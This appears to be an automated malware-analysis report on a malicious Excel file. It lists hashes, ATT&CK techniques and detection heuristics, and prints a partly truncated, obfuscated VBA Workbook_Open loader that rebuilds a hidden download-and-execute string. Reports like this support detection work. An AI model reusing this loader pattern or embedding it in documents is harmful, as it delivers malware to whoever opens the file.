Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 574b59dc1edfd81d…

MALICIOUS

Office (OOXML)

Size: 62.7 KB
Created: 2004-08-16 18:44:14 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2020-09-15
MD5: f743ef79b812d3133a9374bd472e0362
SHA-1: c3755a19e92751ae231c70936a0cb930735bab34
SHA-256: 574b59dc1edfd81da481081c8a8eeae2f3f9c62965a25ef4ab67aacbd4ce63fa
Risk Score: 212

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The file is a malicious Excel document containing an obfuscated VBA macro loader within the Workbook_Open event. This macro is designed to execute code via CreateObject, likely to download and run a secondary payload. No specific family could be identified, and the embedded URLs were confirmed benign.

Heuristics (8)

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • External hyperlinks (1) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 1 external hyperlink — clickable URLs are stored as external relationships. First target: https://www.vertex42.com/ExcelTemplates/quote-template.html
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • https://www.vertex42.com/ExcelTemplates/quote-template.html (Document hyperlink)
    • https://www.vertex42.com/licensing/EULA_privateuse.html (Document hyperlink)
    • https://www.vertex42.com/ExcelArticles/invoicing.html (Document hyperlink)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 10406 bytes
SHA-256: db3e3f12813c702e7c2f6919a9494b6d36d3f266e748fb6a0dae71ec4e9ba828
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function LPuhk(GmTeWCTGbDFcIzusfbqLy, bDkpSSm, JERtqhdchpekWLICVxxxvIFKY)
TAuA = "OJNODtBhNhQv"
TVUpfAzGUoWOhzFdQVRHrHnjirODd = "UuTMOPgeUtAE"
VrAVuwExLyoqMhkGnlvdJUbuVlqwlBYGnMSsiWU = 4.79204328967529E+26
LPuhk "ZOIwfWCiw"
End Function

Sub nHIpzOGyttzVZbWeuzOprStFJWeeTrrCZv(gHEakBQGAIGHLKahCzOsYR, oEvLfOzjHANVQBMbQ, bVLBRCxVyTCTDAOqQVpplsBZy, xpKgqXxQw, FmnsNJPfgowNGZkqmbqjUmDKFILSdeVnDSldiwbc, VtJKjikvzkWZNbTjdmFxxCBSIJ)
oqvWKHcaqdRfWaXHTuUwVNCgdkbfBCxveeinycDiO = "DbsqHDvjXHFybanOtafxYngVBsskIqqlicKbnm"
XjReppgCIzjicDQUPvWpPLLbg = "UQyQMbHyHOGIrfUpj"
YIOhRIufQwMLYqyYVPErmIbdvCNGErUa = "aCYCmyqVgKKmwqQKSKFksxQgk"
PunbZclkxnZViRNVGyRrzMxvlgPpjcmrS = 7.56389786646568E+29
jviF = 3.66643497618003E+18
iALsckwcnXWrRPsnDxrptMvAUBhDiiSn = 8.73568241534631E+34
Njqn = "VLpEbSNkUcZMfxqPrV"
LXaCtuF = "irEgCAj"
End Sub

Function tngdGoHnlJYXMQxcoIPwkxiQqFU(gAokdmkhFeVCUxlVNlbvuIvKW, ftPwXMvVJOClbY, txPYDjlFjSQYohYFeOPHqRJGJGznWSbKDI, KglT)
gNYsukNClfzUyLCNuEymKYWXWWtw = "PmBTbGX"
fcbCurIIuxYvVWmHhVIrAWYqRxVtyBXE = "cOcXkQhNPcZVAjsAtlFyfkJEkkw"
PJsZUQtHKkxEaeluyVRO = 3.20720923727035E+27
sFPRGzsFXmzTMxFjzBkqkqJnBY = "yOFO"
tngdGoHnlJYXMQxcoIPwkxiQqFU "isWEdHOQACmxylOgfLz"
End Function

Function FyXwkvdIWtNNJybvzqrKUrTAfqYgBafhztDBrENeLn(gYsCwcQiytqRXflUaBF, nTpiDLpPJUTDGtnJzUIArfRHLUZSzuFdFIhMi, zlmAYeamLesb, GtEAHCiWilWQPOpyxMab, UWOqHnhYJvaXZzkAIaKAnQzQkJPkoNRRAgl, qJzOBxZpvspPFyplPaAEW)
wBrorKUbKNMdOfWRuWxG = "NfOQuZEucMyhVWyoBhWhyUUnPpWUnTHOgYiWdYwkQ"
iANvsIYcspbZytLbAFDjGJEkBwncL = 2.85658817393385E+34
klRRmTZUwNwKaSmHapKCXrggaY = "ctwUvRPEpHhHrBfIqnvimyuWyRJFtElqNYxaAsAt"
NwztiTAriqsf = "JezZWeIKLlWqtTEFIxnCXYBvcQyINKOsLWOS"
aVWkABLcCoAwmasFcTkcExGfA = "AWefWEldhcQSWWqSabxMakWmjDdqXdPqkDAoxXSvK"
sQoJwOmlXfi = "WQArwTbuGEMaiSVBUCJCBRrFxZGPElGkIv"
koFayUQCoDObeskQUVgnFYuuXMMqU = 8.26566512405928E+41
cSmllMObKhlODCjxcWTVmObIbLtLDmIZipawpsGYBs = "yCrUsLZkpXzM"
FyXwkvdIWtNNJybvzqrKUrTAfqYgBafhztDBrENeLn "qdKZTDXYZLfNbm"
End Function

Private Sub Workbook_Open()
Dim vbChMnJWt As String

vbChMnJWt = iDNVWZmIY(vvrDhhKbP(iDNVWZm... (truncated)
vbChMnJWt = GwhjNkxjC(vbChMnJWt, "X.XV", "http")
vbChMnJWt = GwhjNkxjC(vbChMnJWt, "C.Ck", "e")
vbChMnJWt = GwhjNkxjC(vbChMnJWt, "K.mP", "P")
xbKKpkzmO (vbChMnJWt)
End Sub

Sub lwqlOIyxFDDesjvFDChplOuglDyDLYOOIIOKeJi(kQvUtDdGjr, AeCSB, dMFLhhEyUmYqLGQYQzYcfSKNXbiRCtV, KwjOgxCiq, ZQEQXklcNCuYELCsnGyn, aQRfPXBrTxqmJstIHDygafTMlsYMnKvkCayzmkIN, kuEDmuSIkfDAHUvxFuWypDIBFjiuuVX)
vZtmAeJVndrrohIXCJzLKvlhooWjUlatTktMUIfGt = "QigWaaArIUKXlAoMxMIaACDyY"
owCues = 7460513
ifDARNvjdcFivztYI = 5.69756586273522E+31
TyTbNeiyXmD = "OqRFDVkLfyMrXZxPcEuYtjKuxHRYRTqJfnOP"
pwYnxeVlcDohTVTrf = 8.49905619392754E+22
efXIvDMuMHDLkKixmHWkvFpIUEcqxyXSzqkjuhAUa = 8479652875#
SNiRSe = "WiLUuAYpOnrbVwOklLtZyDEHBJsncaDlxrbPMxEpLug"
JtFGEdxFYFASdDSlIlNnjFdeVyXnHENEXKyIEmj = 8.06947642985545E+22
dyMsqIlIeThagsKDQakFFJxUrwvTFKgVBOJksknNNPI = 797642263
WnXezusdBetUAsBuMSDTnLYSjaKfnXsqAK = 6.01905581409253E+41
End Sub

Function DBfpxCKVnaLYIDbEwYZFNXuUyz(EYRTKSCUXUpjAjsAuLozLOEuZkMqdlCTquwWuysBkr, xtqJ, vWxeMKmqTWtaFMqlSW
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 45056 bytes
SHA-256: bed2e39fc0fa0957ac93d9c92e6d44916b57774d0f3ebe530b09c516524b0329
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).